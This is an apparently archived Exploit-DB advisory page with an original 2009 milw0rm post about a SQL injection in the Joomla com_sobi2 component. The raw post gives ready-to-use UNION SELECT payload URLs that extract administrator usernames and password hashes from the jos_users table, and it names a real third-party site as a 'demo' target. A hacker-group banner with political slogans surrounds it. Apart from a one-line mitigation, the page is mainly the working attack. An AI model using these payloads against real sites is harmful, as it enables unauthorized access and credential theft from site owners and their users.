GaZa WiLL NeVeR DiE

vendor:

N/A

by:

Br1ght D@rk

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

An attacker can exploit a SQL injection vulnerability in the 'bid' parameter of the 'index.php' script to execute arbitrary SQL commands. The vulnerable code is located in the 'com_sobi2' component. The attacker can use the 'union' SQL operator to access the 'jos_users' table and extract the username and password of the administrator.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

 
                          ||          ||   | ||         
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
                  ( :   /    (_)    /           (   .   

      +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
      |                                                           |
      |                   GaZa WiLL NeVeR DiE                     |
      |       		                                          |
      |                                                           |
      |         Proud To Be A MusLiM , Proud To Be A EgYpTiaN     |
      |                                                           |
      +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 
 
<<!>> Found by  :  Br1ght D@rk
 
<<!>> C0ntact : MiDo2005_2010 [at] hotmail.com  
                    
<<!>> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS  
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
 
 
<<->> D0rk    : find it
 
<<->> Exploit :>>>                
                                    
              :>>>  http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--
 
<<->>  DeM00  :>>>  http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users-- 

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
 
<<->> All freinds , all muslims , Egy C0ders , AsbMay Group,sec-geeks.com 

                                  <--[ sec-geeks.com ]-->

# milw0rm.com [2009-01-21]